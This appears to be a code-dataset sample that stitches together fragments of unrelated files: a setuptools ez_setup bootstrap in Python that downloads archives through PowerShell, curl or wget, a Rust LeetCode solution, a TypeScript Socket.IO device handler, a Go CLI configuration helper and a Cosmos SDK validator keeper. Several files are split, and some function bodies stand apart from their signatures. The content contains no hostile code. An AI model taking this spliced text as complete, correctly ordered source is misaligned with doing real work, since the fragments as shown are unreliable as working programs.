version=DEFAULT_VERSION, download_base=DEFAULT_URL,
to_dir=DEFAULT_SAVE_DIR, download_delay=15):
"""
Ensure that a setuptools version is installed.
Return None. Raise SystemExit if the requested version
or later cannot be installed.
"""
to_dir = os.path.abspath(to_dir)
# prior to importing, capture the module state for
# representative modules.
rep_modules = 'pkg_resources', 'setuptools'
imported = set(sys.modules).intersection(rep_modules)
try:
import pkg_resources
pkg_resources.require("setuptools>=" + version)
# a suitable version is already installed
return
except ImportError:
# pkg_resources not available; setuptools is not installed; download
pass
except pkg_resources.DistributionNotFound:
# no version of setuptools was found; allow download
pass
except pkg_resources.VersionConflict as VC_err:
if imported:
_conflict_bail(VC_err, version)
# otherwise, unload pkg_resources to allow the downloaded version to
# take precedence.
del pkg_resources
_unload_pkg_resources()
return _do_download(version, download_base, to_dir, download_delay)
def _conflict_bail(VC_err, version):
"""
Setuptools was imported prior to invocation, so it is
unsafe to unload it. Bail out.
"""
conflict_tmpl = textwrap.dedent("""
The required version of setuptools (>={version}) is not available,
and can't be installed while this script is running. Please
install a more recent version first, using
'easy_install -U setuptools'.
(Currently using {VC_err.args[0]!r})
""")
msg = conflict_tmpl.format(**locals())
sys.stderr.write(msg)
sys.exit(2)
def _unload_pkg_resources():
del_modules = [
name for name in sys.modules
if name.startswith('pkg_resources')
]
for mod_name in del_modules:
del sys.modules[mod_name]
def _clean_check(cmd, target):
"""
Run the command to download target.
If the command fails, clean up before re-raising the error.
"""
try:
subprocess.check_call(cmd)
except subprocess.CalledProcessError:
if os.access(target, os.F_OK):
os.unlink(target)
raise
def download_file_powershell(url, target):
"""
Download the file at url to target using Powershell.
Powershell will validate trust.
Raise an exception if the command cannot complete.
"""
target = os.path.abspath(target)
ps_cmd = (
"[System.Net.WebRequest]::DefaultWebProxy.Credentials = "
"[System.Net.CredentialCache]::DefaultCredentials; "
"(new-object System.Net.WebClient).DownloadFile(%(url)r, %(target)r)"
% vars()
)
cmd = [
'powershell',
'-Command',
ps_cmd,
]
_clean_check(cmd, target)
def has_powershell():
"""Determine if Powershell is available."""
if platform.system() != 'Windows':
return False
cmd = ['powershell', '-Command', 'echo test']
with open(os.path.devnull, 'wb') as devnull:
try:
subprocess.check_call(cmd, stdout=devnull, stderr=devnull)
except Exception:
return False
return True
download_file_powershell.viable = has_powershell
def download_file_curl(url, target):
cmd = ['curl', url, '--silent', '--output', target]
_clean_check(cmd, target)
def has_curl():
cmd = ['curl', '--version']
with open(os.path.devnull, 'wb') as devnull:
try:
subprocess.check_call(cmd, stdout=devnull, stderr=devnull)
except Exception:
return False
return True
download_file_curl.viable = has_curl
def download_file_wget(url, target):
cmd = ['wget', url, '--quiet', '--output-document', target]
_clean_check(cmd, target)
def has_wget():
cmd = ['wget', '--version']
with open(os.path.devnull, 'wb') as devnull:
try:
subprocess.check_call(cmd, stdout=devnull, stderr=devnull)
except Exception:
return False
return True
download_file_wget.viable = has_wget
def download_file_insecure(url, target):
"""Use Python to download the file, without connection authentication."""
src = urlopen(url)
try:
# Read all the data in one block.
data = src.read()
finally:
src.close()
# Write all the data in one block to avoid creating a partial file.
with open(target, "wb") as dst:
dst.write(data)
download_file_insecure.viable = lambda: True
def get_best_downloader():
downloaders = (
download_file_powershell,
download_file_curl,
download_file_wget,
download_file_insecure,
)
viable_downloaders = (dl for dl in downloaders if dl.viable())
return next(viable_downloaders, None)
def download_setuptools(
version=DEFAULT_VERSION, download_base=DEFAULT_URL,
to_dir=DEFAULT_SAVE_DIR, delay=15,
downloader_factory=get_best_downloader):
"""
Download setuptools from a specified location and return its filename.
`version` should be a valid setuptools version number that is available
as an sdist for download under the `download_base` URL (which should end
with a '/'). `to_dir` is the directory where the egg will be downloaded.
`delay` is the number of seconds to pause before an actual download
attempt.
``downloader_factory`` should be a function taking no arguments and
returning a function for downloading a URL to a target.
"""
# making sure we use the absolute path
to_dir = os.path.abspath(to_dir)
zip_name = "setuptools-%s.zip" % version
url = download_base + zip_name
saveto = os.path.join(to_dir, zip_name)
if not os.path.exists(saveto): # Avoid repeated downloads
log.warn("Downloading %s", url)
downloader = downloader_factory()
downloader(url, saveto)
return os.path.realpath(saveto)
def _build_install_args(options):
"""
Build the arguments to 'python setup.py install' on the setuptools package.
Returns list of command line arguments.
"""
return ['--user'] if options.user_install else []
def _parse_args():
"""Parse the command line for options."""
parser = optparse.OptionParser()
parser.add_option(
'--user', dest='user_install', action='store_true', default=False,
help='install in user site package (requires Python 2.6 or later)')
parser.add_option(
'--download-base', dest='download_base', metavar="URL",
default=DEFAULT_URL,
help='alternative URL from where to download the setuptools package')
parser.add_option(
'--insecure', dest='downloader_factory', action='store_const',
const=lambda: download_file_insecure, default=get_best_downloader,
help='Use internal, non-validating downloader'
)
parser.add_option(
'--version', help="Specify which version to download",
default=DEFAULT_VERSION,
)
parser.add_option(
'--to-dir',
help="Directory to save (and re-use) package",
default=DEFAULT_SAVE_DIR,
)
options, args = parser.parse_args()
# positional arguments are ignored
return options
def _download_args(options):
"""Return args for download_setuptools function from cmdline args."""
return dict(
version=options.version,
download_base=options.download_base,
downloader_factory=options.downloader_factory,
to_dir=options.to_dir,
)
def main():
"""Install or upgrade setuptools and EasyInstall."""
options = _parse_args()
archive = download_setuptools(**_download_args(options))
return _install(archive, _build_install_args(options))
if __name__ == '__main__':
sys.exit(main())
| |
_1758_minimum_changes_to_make_alternating_binary_string.rs
|
struct Solution;
impl Solution {
fn min_operations(s: String) -> i32 {
let mut odd = [0, 0];
let mut even = [0, 0];
let s: Vec<char> = s.chars().collect();
let n = s.len();
for i in 0..n {
if i % 2 == 0 {
if s[i] == '0' {
even[0] += 1;
} else {
even[1] += 1;
}
} else {
if s[i] == '0' {
odd[0] += 1;
} else {
odd[1] += 1;
}
}
}
let a = (even[0] - (n + 1) as i32 / 2).abs() + (odd[1] - n as i32 / 2).abs();
let b = (odd[0] - n as i32 / 2).abs() + (even[1] - (n + 1) as i32 / 2).abs();
a.min(b)
}
}
#[test]
fn test()
|
{
let s = "0100".to_string();
let res = 1;
assert_eq!(Solution::min_operations(s), res);
let s = "10".to_string();
let res = 0;
assert_eq!(Solution::min_operations(s), res);
let s = "1111".to_string();
let res = 2;
assert_eq!(Solution::min_operations(s), res);
}
|
|
SocketDeviceHandler.ts
|
import * as socketIO from "socket.io";
import {
Device,
GlobalAudioProducer,
GlobalVideoProducer,
SoundCard,
SoundCardId,
Track,
TrackId,
TrackPreset,
TrackPresetId,
User
} from "../model.server";
import {ObjectId} from "mongodb";
import {serverAddress} from "../index";
import {ClientDeviceEvents, ServerDeviceEvents} from "../events";
import * as pino from "pino";
import {omit} from "lodash";
import {MongoRealtimeDatabase} from "../database/MongoRealtimeDatabase";
import {
AddAudioProducerPayload, AddSoundCardPayload, AddTrackPayload, AddTrackPresetPayload,
AddVideoProducerPayload, ChangeSoundCardPayload, ChangeTrackPayload, ChangeTrackPresetPayload,
RemoveAudioProducerPayload, RemoveSoundCardPayload, RemoveTrackPayload, RemoveTrackPresetPayload,
RemoveVideoProducerPayload
} from "../payloads";
const logger = pino({
level: process.env.LOG_LEVEL || 'info'
});
export class SocketDeviceHandler {
private readonly serverAddress: string;
private readonly database: MongoRealtimeDatabase;
private readonly user: User;
private readonly socket: socketIO.Socket;
private device: Device;
constructor(serverAddress: string, database: MongoRealtimeDatabase, user: User, socket: socketIO.Socket) {
this.serverAddress = serverAddress;
this.user = user;
this.database = database;
this.socket = socket;
}
init() {
this.socket.on(ClientDeviceEvents.UPDATE_DEVICE, (payload: Partial<Device>) => {
if (!payload._id)
return;
return this.database.updateDevice(this.user._id, payload._id, omit(payload, '_id'));
});
this.socket.on(ClientDeviceEvents.ADD_AUDIO_PRODUCER, (
payload: AddAudioProducerPayload, fn: (error: string | null, producer?: GlobalAudioProducer) => void
) => {
const routerId = new ObjectId(payload.routerId);
// Get current stage id
return this.database.createAudioProducer({
routerId: routerId,
routerProducerId: payload.routerProducerId,
deviceId: this.device._id,
userId: this.user._id,
})
.then(producer => fn(null, producer))
.catch(error => fn(error.message))
});
this.socket.on(ClientDeviceEvents.REMOVE_AUDIO_PRODUCER, (payload: RemoveAudioProducerPayload, fn: (error?: string) => void) => {
const id = new ObjectId(payload);
return this.database.deleteAudioProducer(this.user._id, id)
.then(() => {
fn()
})
.catch(error => {
logger.error(error);
fn(error.message);
})
}
);
this.socket.on(ClientDeviceEvents.ADD_VIDEO_PRODUCER, (
payload: AddVideoProducerPayload, fn: (error: string | null, producer?: GlobalVideoProducer) => void
) => {
// Get current stage id
logger.debug("[SOCKET DEVICE HANDLER] ADD VIDEO PRODUCER " + payload.routerId);
const routerId = new ObjectId(payload.routerId);
return this.database.createVideoProducer({
routerId: routerId,
routerProducerId: payload.routerProducerId,
deviceId: this.device._id,
userId: this.user._id,
})
.then(producer => fn(null, producer))
.catch(error => fn(error.message))
});
this.socket.on(ClientDeviceEvents.REMOVE_VIDEO_PRODUCER, (payload: RemoveVideoProducerPayload, fn: (error?: string) => void) => {
const id = new ObjectId(payload);
logger.debug("[SOCKET DEVICE HANDLER] REMOVE VIDEO PRODUCER " + payload);
return this.database.deleteVideoProducer(this.user._id, id)
.then(() => {
fn()
})
.catch(error => {
logger.error(error);
fn(error.message);
})
}
);
this.socket.on(ClientDeviceEvents.ADD_SOUND_CARD, (payload: AddSoundCardPayload, fn: (soundCard: SoundCard) => void) =>
//TODO: Validate data
this.database.createSoundCard({
name: "",
numInputChannels: 0,
numOutputChannels: 0,
sampleRate: 48000,
periodSize: 96,
numPeriods: 2,
driver: "JACK",
...payload.initial,
trackPresetId: payload.initial.trackPresetId ? new ObjectId(payload.initial.trackPresetId) : undefined,
userId: this.user._id
})
.then(soundCard => fn(soundCard)));
this.socket.on(ClientDeviceEvents.CHANGE_SOUND_CARD, (payload: ChangeSoundCardPayload, fn: (soundCard: Partial<SoundCard>) => void) => {
const id = new ObjectId(payload.id);
const trackPresetId = payload.update.trackPresetId ? new ObjectId(payload.update.trackPresetId) : undefined;
this.database.updateSoundCard(this.device._id, id, {
...payload.update,
trackPresetId: trackPresetId
})
.then(() => fn({
...payload.update,
trackPresetId: trackPresetId,
_id: id
}))
});
this.socket.on(ClientDeviceEvents.REMOVE_SOUND_CARD, (id: RemoveSoundCardPayload, fn: () => void) =>
this.database.deleteSoundCard(this.device._id, new ObjectId(id))
.then(() => fn())
);
this.socket.on(ClientDeviceEvents.ADD_TRACK_PRESET, (payload: AddTrackPresetPayload, fn: (trackPreset: TrackPreset) => void) => {
const soundCardId = new ObjectId(payload.initial.soundCardId);
return this.database.createTrackPreset({
name: "",
outputChannels: [],
...payload.initial,
soundCardId: soundCardId,
userId: this.user._id
})
.then(trackPreset => fn(trackPreset));
});
this.socket.on(ClientDeviceEvents.CHANGE_TRACK_PRESET, (payload: ChangeTrackPresetPayload, fn: (trackPreset: Partial<TrackPreset>) => void) => {
const id = new ObjectId(payload.id);
return this.database.updateTrackPreset(this.device._id, id, payload.update)
.then(() => fn({
...payload.update,
_id: id
}));
});
this.socket.on(ClientDeviceEvents.REMOVE_TRACK_PRESET, (id: RemoveTrackPresetPayload, fn: () => void) =>
this.database.deleteTrackPreset(this.device._id, new ObjectId(id))
.then(() => fn())
|
);
this.socket.on(ClientDeviceEvents.ADD_TRACK, (payload: AddTrackPayload, fn: (track: Track) => void) => {
if (payload.initial.trackPresetId) {
const trackPresetId = new ObjectId(payload.initial.trackPresetId);
return this.database.createTrack({
channel: payload.initial.channel || 0,
gain: payload.initial.gain || 0,
volume: payload.initial.volume || 1,
directivity: payload.initial.directivity || "omni",
trackPresetId: trackPresetId,
online: true,
userId: this.user._id,
})
.then(track => fn(track));
}
});
this.socket.on(ClientDeviceEvents.CHANGE_TRACK, (payload: ChangeTrackPayload, fn: (track: Partial<Track>) => void) => {
const id = new ObjectId(payload.id);
return this.database.updateTrack(this.device._id, id, payload.update)
.then(() => fn({
...payload.update,
_id: id
}))
});
this.socket.on(ClientDeviceEvents.REMOVE_TRACK, (id: RemoveTrackPayload, fn: () => void) =>
this.database.deleteTrack(this.device._id, new ObjectId(id))
.then(() => fn())
);
this.socket.on("disconnect", async () => {
if (this.device && !this.device.mac) {
logger.debug("Removed device '" + this.device.name + "' of " + this.user.name);
return this.database.deleteDevice(this.device._id)
.then(() => this.database.renewOnlineStatus(this.user._id));
} else {
logger.debug("Switched device '" + this.device.name + "' of " + this.user.name + " to offline");
return this.database.updateDevice(this.user._id, this.device._id, {online: false})
.then(() => this.database.renewOnlineStatus(this.user._id));
}
/*if (this.user.stageMemberId) {
if (await DeviceModel.count({userId: this.user._id, online: true}) === 0) {
return StageMemberModel.findByIdAndUpdate(this.user.stageMemberId, {online: false}).exec();
}
}*/
});
logger.debug("[SOCKET DEVICE HANDLER] Registered handler for user " + this.user.name + " at socket " + this.socket.id);
}
async generateDevice(): Promise<Device> {
logger.debug("Generating device for user " + this.user.name + "...");
let initialDevice: Device;
if (this.socket.handshake.query && this.socket.handshake.query.device) {
initialDevice = JSON.parse(this.socket.handshake.query.device);
if (initialDevice.mac) {
// Try to get device by mac
this.device = await this.database.readDeviceByUserAndMac(this.user._id, initialDevice.mac);
if (this.device) {
this.device.online = true;
return this.database.updateDevice(this.user._id, this.device._id, {online: true})
.then(() => this.device);
}
}
}
// We have to create the device
const device: Omit<Device, "_id"> = {
canVideo: false,
canAudio: false,
sendAudio: false,
sendVideo: false,
receiveAudio: false,
receiveVideo: false,
name: "",
...initialDevice,
soundCardIds: [],
server: serverAddress,
userId: this.user._id,
online: true
};
this.device = await this.database.createDevice(device);
// In addition notify user (not in the socket group yet)
this.database.sendToDevice(this.socket, ServerDeviceEvents.LOCAL_DEVICE_READY, this.device);
logger.debug("Finished generating device for user " + this.user.name + " by creating new.");
return this.device;
}
public sendRemoteDevices(): Promise<void> {
// Send other devices
return this.database.readDevicesByUser(this.user._id)
.then(remoteDevices =>
remoteDevices.forEach(remoteDevice => {
if (remoteDevice._id.toString() !== this.device._id.toString()) {
logger.debug("Sent remote device " + remoteDevice._id + " to device " + this.device.name + " of " + this.user.name + "!");
return this.database.sendToDevice(this.socket, ServerDeviceEvents.DEVICE_ADDED, remoteDevice);
}
})
);
}
}
| |
configure.go
|
/*
Copyright © 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package aid
import (
"bufio"
"encoding/json"
"fmt"
"io/ioutil"
"os"
"runtime"
"strconv"
"strings"
"github.com/awslabs/clencli/helper"
"github.com/sirupsen/logrus"
"github.com/spf13/cobra"
"github.com/spf13/viper"
"gopkg.in/yaml.v2"
)
// ConfigurationsDirectoryExist returns `true` if the configuration directory exist, `false` otherwise
func ConfigurationsDirectoryExist() bool {
return helper.DirOrFileExists(GetAppInfo().ConfigurationsDir)
}
// ConfigurationsFileExist returns `true` if the configuration file exist, `false` otherwise
func ConfigurationsFileExist() bool {
return helper.DirOrFileExists(GetAppInfo().ConfigurationsPath)
}
// CreateConfigurationsDirectory creates the configuration directory, returns `true` if the configuration directory exist, `false` otherwise
func CreateConfigurationsDirectory() (bool, string) {
dir := GetAppInfo().ConfigurationsDir
return helper.MkDirsIfNotExist(dir), dir
}
// CredentialsFileExist returns `true` if the credentials file exist, `false` otherwise
func CredentialsFileExist() bool {
return helper.DirOrFileExists(GetAppInfo().CredentialsPath)
}
// ReadConfig returns the viper instance of the given configuration `name`
func ReadConfig(name string) (*viper.Viper, error) {
v := viper.New()
app := GetAppInfo()
v.SetConfigName(name)
v.SetConfigType("yaml")
v.AddConfigPath(app.ConfigurationsDir)
err := v.ReadInConfig()
if err != nil {
return v, fmt.Errorf("unable to read configuration:%s\n%v", name, err)
}
return v, err
}
// ReadConfigAsViper returns...
func ReadConfigAsViper(configPath string, configName string, configType string) (*viper.Viper, error) {
v := viper.New()
v.AddConfigPath(configPath)
v.SetConfigName(configName)
v.SetConfigType(configType)
err := v.ReadInConfig()
if err != nil {
return v, fmt.Errorf("unable to read configuration as viper\n%v", err)
}
return v, err
}
// ReadTemplate read the given template under clencli/*.yaml
func ReadTemplate(fileName string) (*viper.Viper, error) {
c := viper.New()
c.AddConfigPath("clencli")
c.SetConfigName(fileName)
c.SetConfigType("yaml")
c.SetConfigPermissions(os.ModePerm)
err := c.ReadInConfig() // Find and read the c file
if err != nil { // Handle errors reading the c file
return c, fmt.Errorf("Unable to read "+fileName+" via Viper"+"\n%v", err)
}
return c, nil
}
// WriteInterfaceToFile write the given interface into a file
func WriteInterfaceToFile(in interface{}, path string) error {
b, err := yaml.Marshal(&in)
if err != nil {
_, ok := err.(*json.UnsupportedTypeError)
if ok {
return fmt.Errorf("json unsupported type error")
}
}
err = ioutil.WriteFile(path, b, os.ModePerm)
if err != nil {
return fmt.Errorf("unable to update:%s\n%v", path, err)
}
return err
}
// DeleteCredentialFile delete the credentials file
func DeleteCredentialFile() error {
|
// DeleteConfigurationFile delete the credentials file
func DeleteConfigurationFile() error {
return helper.DeleteFile(GetAppInfo().ConfigurationsPath)
}
// DeleteConfigurationsDirectory delete the configurations directory
func DeleteConfigurationsDirectory() error {
return os.RemoveAll(GetAppInfo().ConfigurationsDir)
}
// GetSensitiveUserInput get sensitive input as string
func GetSensitiveUserInput(cmd *cobra.Command, text string, info string) (string, error) {
return getUserInput(cmd, text+" ["+maskString(info, 3)+"]", "")
}
func maskString(s string, showLastChars int) string {
maskSize := len(s) - showLastChars
if maskSize <= 0 {
return s
}
return strings.Repeat("*", maskSize) + s[maskSize:]
}
// GetSensitiveUserInputAsString get sensitive input as string
func GetSensitiveUserInputAsString(cmd *cobra.Command, text string, info string) string {
answer, err := GetSensitiveUserInput(cmd, text, info)
if err != nil {
logrus.Fatalf("unable to get user input about profile's name\n%v", err)
}
// if user typed ENTER, keep the current value
if answer != "" {
return answer
}
return info
}
func getInput() (string, error) {
reader := bufio.NewReader(os.Stdin)
text, err := reader.ReadString('\n')
if err != nil {
return "", err
}
if runtime.GOOS == "windows" {
// convert LF to CRLF
text = strings.Replace(text, "\r\n", "", -1)
} else {
// convert CRLF to LF
text = strings.Replace(text, "\n", "", -1)
}
return text, nil
}
func getUserInput(cmd *cobra.Command, text string, info string) (string, error) {
if info == "" {
cmd.Print(text + ": ")
} else {
cmd.Print(text + " [" + info + "]: ")
}
input, err := getInput()
return input, err
}
// GetUserInputAsBool prints `text` on console and return answer as `boolean`
func GetUserInputAsBool(cmd *cobra.Command, text string, info bool) bool {
answer, err := getUserInput(cmd, text, strconv.FormatBool(info))
if err != nil {
logrus.Fatalf("unable to get user input as boolean\n%s", err)
}
if answer == "true" {
return true
} else if answer == "false" {
return false
}
return info
}
// GetUserInputAsString prints `text` on console and return answer as `string`
func GetUserInputAsString(cmd *cobra.Command, text string, info string) string {
answer, err := getUserInput(cmd, text, info)
if err != nil {
logrus.Fatalf("unable to get user input about profile's name\n%v", err)
}
// if user typed ENTER, keep the current value
if answer != "" {
return answer
}
return info
}
|
return helper.DeleteFile(GetAppInfo().CredentialsPath)
}
|
validator.go
|
package keeper
import (
"bytes"
"fmt"
"time"
sdk "github.com/cosmos/cosmos-sdk/types"
"github.com/bertux/nameservice/x/staking/types"
)
// Cache the amino decoding of validators, as it can be the case that repeated slashing calls
// cause many calls to GetValidator, which were shown to throttle the state machine in our
// simulation. Note this is quite biased though, as the simulator does more slashes than a
// live chain should, however we require the slashing to be fast as noone pays gas for it.
type cachedValidator struct {
val types.Validator
marshalled string // marshalled amino bytes for the validator object (not operator address)
}
func newCachedValidator(val types.Validator, marshalled string) cachedValidator
|
// get a single validator - this selects a particular validator #cosmospoa - based on address
func (k Keeper) GetValidator(ctx sdk.Context, addr sdk.ValAddress) (validator types.Validator, found bool) {
store := ctx.KVStore(k.storeKey)
value := store.Get(GetValidatorKey(addr))
if value == nil {
return validator, false
}
// If these amino encoded bytes are in the cache, return the cached validator
strValue := string(value)
if val, ok := k.validatorCache[strValue]; ok {
valToReturn := val.val
// Doesn't mutate the cache's value
valToReturn.OperatorAddress = addr
return valToReturn, true
}
// amino bytes weren't found in cache, so amino unmarshal and add it to the cache
validator = types.MustUnmarshalValidator(k.cdc, value)
cachedVal := newCachedValidator(validator, strValue)
k.validatorCache[strValue] = newCachedValidator(validator, strValue)
k.validatorCacheList.PushBack(cachedVal)
// if the cache is too big, pop off the last element from it
if k.validatorCacheList.Len() > aminoCacheSize {
valToRemove := k.validatorCacheList.Remove(k.validatorCacheList.Front()).(cachedValidator)
delete(k.validatorCache, valToRemove.marshalled)
}
validator = types.MustUnmarshalValidator(k.cdc, value)
return validator, true
}
func (k Keeper) mustGetValidator(ctx sdk.Context, addr sdk.ValAddress) types.Validator {
validator, found := k.GetValidator(ctx, addr)
if !found {
panic(fmt.Sprintf("validator record not found for address: %X\n", addr))
}
return validator
}
// get a single validator by consensus address
func (k Keeper) GetValidatorByConsAddr(ctx sdk.Context, consAddr sdk.ConsAddress) (validator types.Validator, found bool) {
store := ctx.KVStore(k.storeKey)
opAddr := store.Get(GetValidatorByConsAddrKey(consAddr))
if opAddr == nil {
return validator, false
}
return k.GetValidator(ctx, opAddr)
}
func (k Keeper) mustGetValidatorByConsAddr(ctx sdk.Context, consAddr sdk.ConsAddress) types.Validator {
validator, found := k.GetValidatorByConsAddr(ctx, consAddr)
if !found {
panic(fmt.Errorf("validator with consensus-Address %s not found", consAddr))
}
return validator
}
// set the main record holding validator details
func (k Keeper) SetValidator(ctx sdk.Context, validator types.Validator) {
store := ctx.KVStore(k.storeKey)
bz := types.MustMarshalValidator(k.cdc, validator)
store.Set(GetValidatorKey(validator.OperatorAddress), bz)
}
// validator index
func (k Keeper) SetValidatorByConsAddr(ctx sdk.Context, validator types.Validator) {
store := ctx.KVStore(k.storeKey)
consAddr := sdk.ConsAddress(validator.ConsPubKey.Address())
store.Set(GetValidatorByConsAddrKey(consAddr), validator.OperatorAddress)
}
// validator index
func (k Keeper) SetValidatorByPowerIndex(ctx sdk.Context, validator types.Validator) {
// jailed validators are not kept in the power index
if validator.Jailed {
return
}
store := ctx.KVStore(k.storeKey)
store.Set(GetValidatorsByPowerIndexKey(validator), validator.OperatorAddress)
}
// validator index
func (k Keeper) DeleteValidatorByPowerIndex(ctx sdk.Context, validator types.Validator) {
store := ctx.KVStore(k.storeKey)
store.Delete(GetValidatorsByPowerIndexKey(validator))
}
// validator index
func (k Keeper) SetNewValidatorByPowerIndex(ctx sdk.Context, validator types.Validator) {
store := ctx.KVStore(k.storeKey)
store.Set(GetValidatorsByPowerIndexKey(validator), validator.OperatorAddress)
}
// replace cosmospoa
// Update the tokens of an existing validator, update the validators power index key
func (k Keeper) AddValidatorTokensAndShares(ctx sdk.Context, validator types.Validator,
tokensToAdd sdk.Int) (valOut types.Validator, addedShares sdk.Dec) {
k.DeleteValidatorByPowerIndex(ctx, validator)
pool := k.GetPool(ctx)
validator, pool, addedShares = validator.AddTokensFromDel(pool, tokensToAdd)
k.SetValidator(ctx, validator)
k.SetPool(ctx, pool)
k.SetValidatorByPowerIndex(ctx, validator)
return validator, addedShares
}
// Update the tokens of an existing validator, update the validators power index key
func (k Keeper) RemoveValidatorTokensAndShares(ctx sdk.Context, validator types.Validator,
sharesToRemove sdk.Dec) (valOut types.Validator, removedTokens sdk.Int) {
k.DeleteValidatorByPowerIndex(ctx, validator)
pool := k.GetPool(ctx)
validator, pool, removedTokens = validator.RemoveDelShares(pool, sharesToRemove)
k.SetValidator(ctx, validator)
k.SetPool(ctx, pool)
k.SetValidatorByPowerIndex(ctx, validator)
return validator, removedTokens
}
// Update the tokens of an existing validator, update the validators power index key
func (k Keeper) RemoveValidatorTokens(ctx sdk.Context,
validator types.Validator, tokensToRemove sdk.Int) types.Validator {
k.DeleteValidatorByPowerIndex(ctx, validator)
pool := k.GetPool(ctx)
validator, pool = validator.RemoveTokens(pool, tokensToRemove)
k.SetValidator(ctx, validator)
k.SetPool(ctx, pool)
k.SetValidatorByPowerIndex(ctx, validator)
return validator
}
// UpdateValidatorCommission attempts to update a validator's commission rate.
// An error is returned if the new commission rate is invalid.
func (k Keeper) UpdateValidatorCommission(ctx sdk.Context,
validator types.Validator, newRate sdk.Dec) (types.Commission, sdk.Error) {
commission := validator.Commission
blockTime := ctx.BlockHeader().Time
if err := commission.ValidateNewRate(newRate, blockTime); err != nil {
return commission, err
}
commission.Rate = newRate
commission.UpdateTime = blockTime
return commission, nil
}
// cosmospoa - remove validator func
// remove the validator record and associated indexes
// except for the bonded validator index which is only handled in ApplyAndReturnTendermintUpdates
func (k Keeper) RemoveValidator(ctx sdk.Context, address sdk.ValAddress) {
// first retrieve the old validator record
validator, found := k.GetValidator(ctx, address)
if !found {
return
}
if validator.Status != sdk.Unbonded {
panic("cannot call RemoveValidator on bonded or unbonding validators")
}
if validator.Tokens.IsPositive() {
panic("attempting to remove a validator which still contains tokens")
}
if validator.Tokens.GT(sdk.ZeroInt()) {
panic("validator being removed should never have positive tokens")
}
// delete the old validator record
store := ctx.KVStore(k.storeKey)
store.Delete(GetValidatorKey(address))
store.Delete(GetValidatorByConsAddrKey(sdk.ConsAddress(validator.ConsPubKey.Address())))
store.Delete(GetValidatorsByPowerIndexKey(validator))
// call hooks
k.AfterValidatorRemoved(ctx, validator.ConsAddress(), validator.OperatorAddress)
}
// get groups of validators
// get the set of all validators with no limits, used during genesis dump
func (k Keeper) GetAllValidators(ctx sdk.Context) (validators []types.Validator) {
store := ctx.KVStore(k.storeKey)
iterator := sdk.KVStorePrefixIterator(store, ValidatorsKey)
defer iterator.Close()
for ; iterator.Valid(); iterator.Next() {
validator := types.MustUnmarshalValidator(k.cdc, iterator.Value())
validators = append(validators, validator)
}
return validators
}
// return a given amount of all the validators
func (k Keeper) GetValidators(ctx sdk.Context, maxRetrieve uint16) (validators []types.Validator) {
store := ctx.KVStore(k.storeKey)
validators = make([]types.Validator, maxRetrieve)
iterator := sdk.KVStorePrefixIterator(store, ValidatorsKey)
defer iterator.Close()
i := 0
for ; iterator.Valid() && i < int(maxRetrieve); iterator.Next() {
validator := types.MustUnmarshalValidator(k.cdc, iterator.Value())
validators[i] = validator
i++
}
return validators[:i] // trim if the array length < maxRetrieve
}
// get the current group of bonded validators sorted by power-rank
func (k Keeper) GetBondedValidatorsByPower(ctx sdk.Context) []types.Validator {
store := ctx.KVStore(k.storeKey)
maxValidators := k.MaxValidators(ctx)
validators := make([]types.Validator, maxValidators)
iterator := sdk.KVStoreReversePrefixIterator(store, ValidatorsByPowerIndexKey)
defer iterator.Close()
i := 0
for ; iterator.Valid() && i < int(maxValidators); iterator.Next() {
address := iterator.Value()
validator := k.mustGetValidator(ctx, address)
if validator.Status == sdk.Bonded {
validators[i] = validator
i++
}
}
return validators[:i] // trim
}
// returns an iterator for the current validator power store
func (k Keeper) ValidatorsPowerStoreIterator(ctx sdk.Context) (iterator sdk.Iterator) {
store := ctx.KVStore(k.storeKey)
iterator = sdk.KVStoreReversePrefixIterator(store, ValidatorsByPowerIndexKey)
return iterator
}
//_______________________________________________________________________
// Last Validator Index
// Load the last validator power.
// Returns zero if the operator was not a validator last block.
func (k Keeper) GetLastValidatorPower(ctx sdk.Context, operator sdk.ValAddress) (power int64) {
store := ctx.KVStore(k.storeKey)
bz := store.Get(GetLastValidatorPowerKey(operator))
if bz == nil {
return 0
}
k.cdc.MustUnmarshalBinaryLengthPrefixed(bz, &power)
return
}
// Set the last validator power.
func (k Keeper) SetLastValidatorPower(ctx sdk.Context, operator sdk.ValAddress, power int64) {
store := ctx.KVStore(k.storeKey)
bz := k.cdc.MustMarshalBinaryLengthPrefixed(power)
store.Set(GetLastValidatorPowerKey(operator), bz)
}
// Delete the last validator power.
func (k Keeper) DeleteLastValidatorPower(ctx sdk.Context, operator sdk.ValAddress) {
store := ctx.KVStore(k.storeKey)
store.Delete(GetLastValidatorPowerKey(operator))
}
// returns an iterator for the consensus validators in the last block
func (k Keeper) LastValidatorsIterator(ctx sdk.Context) (iterator sdk.Iterator) {
store := ctx.KVStore(k.storeKey)
iterator = sdk.KVStorePrefixIterator(store, LastValidatorPowerKey)
return iterator
}
// Iterate over last validator powers.
func (k Keeper) IterateLastValidatorPowers(ctx sdk.Context, handler func(operator sdk.ValAddress, power int64) (stop bool)) {
store := ctx.KVStore(k.storeKey)
iter := sdk.KVStorePrefixIterator(store, LastValidatorPowerKey)
defer iter.Close()
for ; iter.Valid(); iter.Next() {
addr := sdk.ValAddress(iter.Key()[len(LastValidatorPowerKey):])
var power int64
k.cdc.MustUnmarshalBinaryLengthPrefixed(iter.Value(), &power)
if handler(addr, power) {
break
}
}
}
// get the group of the bonded validators
func (k Keeper) GetLastValidators(ctx sdk.Context) (validators []types.Validator) {
store := ctx.KVStore(k.storeKey)
// add the actual validator power sorted store
maxValidators := k.MaxValidators(ctx)
validators = make([]types.Validator, maxValidators)
iterator := sdk.KVStorePrefixIterator(store, LastValidatorPowerKey)
defer iterator.Close()
i := 0
for ; iterator.Valid(); iterator.Next() {
// sanity check
if i >= int(maxValidators) {
panic("more validators than maxValidators found")
}
address := AddressFromLastValidatorPowerKey(iterator.Key())
validator := k.mustGetValidator(ctx, address)
validators[i] = validator
i++
}
return validators[:i] // trim
}
//_______________________________________________________________________
// Validator Queue
// gets a specific validator queue timeslice. A timeslice is a slice of ValAddresses corresponding to unbonding validators
// that expire at a certain time.
